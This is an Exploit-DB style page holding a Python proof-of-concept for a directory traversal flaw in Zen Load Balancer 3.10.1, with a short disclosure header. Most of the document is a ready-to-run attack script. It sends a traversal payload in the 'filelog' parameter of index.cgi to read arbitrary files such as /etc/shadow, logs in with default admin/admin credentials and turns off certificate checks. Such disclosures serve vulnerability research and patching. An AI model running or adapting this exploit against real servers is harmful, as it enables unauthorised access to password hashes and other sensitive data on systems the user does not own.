
3 changes to exploits/shellcodes AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) Windscribe 1.83 - 'WindscribeService' Unquoted Service Path Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
31 lines
No EOL
1.3 KiB
Python
Executable file
31 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
|
|
# Date: 2020-04-10
|
|
# Exploit Author: Basim Alabdullah
|
|
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
|
|
# Version: 3.10.1
|
|
# Tested on: Debian8u2
|
|
#
|
|
# Technical Details:
|
|
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
|
|
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
|
|
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
|
|
#
|
|
# Impact:
|
|
# --------
|
|
# Successful exploitation could allow an attacker to obtain sensitive
|
|
# information.
|
|
|
|
import requests
|
|
import sys
|
|
|
|
if len(sys.argv) <2:
|
|
print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
|
|
sys.exit(-1)
|
|
else:
|
|
files=sys.argv[2]
|
|
url=sys.argv[1]
|
|
with requests.session() as s:
|
|
urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
|
|
response = s.get(urlz, auth=('admin', 'admin'), verify=False)
|
|
txt=response.text
|
|
print(response.text) |